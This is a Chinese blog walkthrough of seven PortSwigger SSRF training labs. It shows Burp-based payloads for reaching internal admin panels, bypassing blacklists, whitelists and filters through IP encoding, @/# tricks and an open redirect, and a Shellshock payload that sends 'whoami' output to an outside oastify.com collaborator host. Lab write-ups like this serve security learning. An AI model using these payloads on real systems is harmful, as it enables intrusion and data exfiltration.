首页 > 其他分享 >portswigger 靶场之 SSRF 篇

portswigger 靶场之 SSRF 篇

时间:2023-02-10 14:56:19浏览次数:52  
标签:http SSRF URL portswigger admin burp 靶场 carlos

All labs | Web Security Academy (portswigger.net)

1. 针对本地服务器的基本 SSRF

易受攻击的参数是:库存检查功能

目标:更改 URL 来访问http://localhost/admin并删除用户carlos

分析:

  1. URL 浏览到 /admin 目录返回一个错误,指出该目录仅可从服务器本地使用,或对已登录的管理员可用。

  2. 找到库存检查功能,打开 burp 进行拦截并发送到 repeater,库存将发出与后端 API 通信的请求。在 burp 中观察到有个参数是stockApi,有 http 字样,判断为编码后 URL。通过 Ctrl+Shift+U 对 URL 解码后,能够看到库存检查功能的 URL 路径和端口号。

  3. 查看是否有应用程序在本地主机上运行,将stockApi值换为http://localhost,发送后显示成功,点开 burp 的 Render,能够看到网站页面上有Admin panel字样,说明进入了管理面板

  4. 在 Response 中搜索 admin,可看到Admin panel的路径是/admin,把路径添加到 stockApi 上后,继续在 Response 中搜索 carlos,可看到删除的路径是/admin/delete?username=carlos

  5. 删除 carlos:http://localhost/admin/delete?username=carlos,遵循 302 重定向

检查库存功能

对 URL 进行解码

访问本地

找到了删除的路径

返回查看成功

2. 针对另一个后端系统的基本 SSRF

易受攻击的参数是:库存检查功能

目标:SSRF 扫 IP 并删除用户carlos

分析:

通过 burp suite

  1. 在库存检查功能处抓包,发送到Intruder,对 IP 地址的最后一位“添加有效载荷 §”,type 填 Number,From 1 To 255 Step 1,然后 Start attack。

  2. 攻击完后通过 Status 排序,找到不一致的发送到 Repeater,在最后面添加/admin

  3. 在 Response 中搜索 carlos,可看到删除的路径是admin/delete?username=carlos

  4. 对 URL 编码后发送,遵循 302 重定向,返回即可看到已成功http://192.168.0.18:8080/admin/delete?username=carlos

通过 python

3. 带有基于黑名单的输入滤波器的 SSRF

易受攻击的参数是: 库存检查功能

目标: 访问 http://localhost/admin 的管理界面并删除用户carlos

分析:

  1. 打开 burp 抓包,修改参数为http://localhost/失败了,然后修改为http://127.0.0.1也失败了,再次修改为http://127.1,因为会自动填充缺少的两位八位字节,点击发送发现渲染出来了
  2. 这说明,没有对127.1进行正则匹配(所以设置白名单比黑名单更好)
  3. 还可以把 IP 地址进行 16 进制编码或者 8 进制
    1. 16 进制 --> 7F000001
    2. 10 进制 --> 2130706433
  4. 后面加入/admin,发送后失败了在 burp 中右击Convert selection对 admin 进行编码,或者大小写绕过,最后找到路径直接删除用户即可

测试 http://127.1

大小写绕过

两次 URL 编码

4. 通过开放重定向漏洞旁路过滤器的 SSRF

要点: Open redirect
分析:

  1. 抓包库存检查功能和Next produst并发送到 Repeater,重命名为 Check stock、Next product

  2. 在 Next product 中通过测试 path 参数,观察到 path 参数被放置在Location响应标头中,Location 响应标头表示 URL 需要重定向页面

  3. 应用程序先验证 stockAPI 参数的 URL 是否在允许的域中,紧接着应用程序请求 URL,触发重定向,遵循重定向,向攻击者构造的内部 URL 发出请求

  4. stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

拦截

重定向

重定向到管理界面

重定向到删除

5. 带外检测的盲 SSRF

在加载产品页面时用 burp 抓包,找到 Referer 标头,开启 Collaborator client 把网址替换为 Referer

6. 带有基于白名单的输入滤波器的 SSRF

要点: 利用 URL 解析中的不一致性来绕过过滤器

步骤:

  1. 首先发出请求http://loaclhost,发现响应告诉我们主机名必须是stock.weliketoshop.net

  2. 使用@在主机名之前的 URL 中嵌入凭据,参数改为http://[email protected]

  3. 使用两次 URL 编码后的#使 @stock.weliketoshop.net 失效。#代表网页中的一个位置,位置的标识符

  4. 发出请求http://127.0.0.1%[email protected]即可成功。后面步骤与之前面没有差别了

7. 盲目 SSRF 与壳冲击利用

要点:SSRF 在 Referer, UA 带 Shell shock payload

步骤:

  1. 从 BApp Store 安装“Collaborator Everywhere”扩展,把域名添加到 Burp,以便 Collaborator Everywhere 观察

  2. 回到浏览器,浏览产品页面后点击 return,如此反复,由此产生 HTTP 交互,回到 burp,观察 HTTP 请求中的 User-Agent,并发送到 Intruder

  3. 使用 Burp Collaborator 客户端,更改 Referer 标头,http://192.168.0.1:8080 IP 地址的最后一个八位字节,添加 §

() { :; }; /usr/bin/nslookup $(whoami).yac7iwqg4tsdlyai7czxo0rrcii96y.oastify.com
  1. Payloads 窗口,将 payload 类型为 Numbers,1、255、1,开始攻击

  2. 攻击完成后,回到 Burp Collaborator 客户端,点击 Poll now,能够看到 DNS 交互和操作系统用户的名称

  3. 需要输入操作系统用户的名称即可成功

安装

添加域名

观察 UA

攻击

利用 python

标签:http,SSRF,URL,portswigger,admin,burp,靶场,carlos
From: https://www.cnblogs.com/yii-ling/p/17108878.html

相关文章

  • Web安全入门与靶场实战(32)- 利用find提权
    在上篇文章中,我们找到了靶机中的find命令被设置了SUID权限,那么如何利用find来提权呢?这里需要用到find命令的exec处理动作。之前说过,find属于Linux中比较复杂的一个命令,主要......
  • vulnhub靶场之VENOM: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:Venom:1,下载地址:https://download.vulnhub.com/venom/venom.zip,下载后直接vbox打开即可。知识点:enum4linux扫描、敏感信息发现......
  • DVWA靶场实战(十三)——CSP Bypass
    DVWA靶场实战(十三)十三、CSPBypass:1.漏洞原理:CSPBypass全称是Content-Security-Policy,中文叫做绕过内容安全策略。Content-Security-Policy是一个HTTP响应头的名称......
  • vulnhub靶场之CEREAL: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:Cereal:1,下载地址:https://download.vulnhub.com/cereal/Cereal.ova,下载后直接vbox打开即可。知识点:/etc/passwd文件提权、dns解......
  • Web安全入门与靶场实战(28)- Metasploit基本操作
    继续查看searchsploit搜索出来的exploit,其中有些exploit的描述信息中带有(Metasploit),表示这个exploit已经被集成到了Metasploit中,所以下面我们就使用Metasploit来继续进行she......
  • 红日内网靶场一
    0x00前言这个系列是我打完ay内网靶场以后往后衍生的一个系列,写的过程中会有很多多余的东西是我在尝试的过程,但是我也会记录下来给自己一个提醒积累经验的过程一次两的犯错......
  • SSRF 服务器端请求伪造
    0x01定义SSRF(Server-SideRequestForgery:服务器端请求伪造)是一种由攻击者构造,形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内......
  • 免费网络安全靶场(推荐)
    皮卡丘(pikachu):https://github.com/zhuifengshaonianhanlu/pikachuOceanCTF:https://github.com/tongchengbin/ocean_ctfMellivora:https://github.com/Nakiami/mellivora......
  • Metasploitable靶场
    1基本环境虚拟机账号密码:msfadmin/msfadminkali主机IP:192.168.5.136metasploitable2靶机IP:192.168.5.160使用浏览器登录靶机:   2信息收集└─#nmap192.1......
  • vulnhub靶场之DIGITALWORLD.LOCAL: VENGEANCE
    准备:攻击机:虚拟机kali、本机win10。靶机:digitalworld.local:VENGEANCE,下载地址:https://download.vulnhub.com/digitalworld/VENGEANCE.7z,下载后直接vm打开即可。知识点......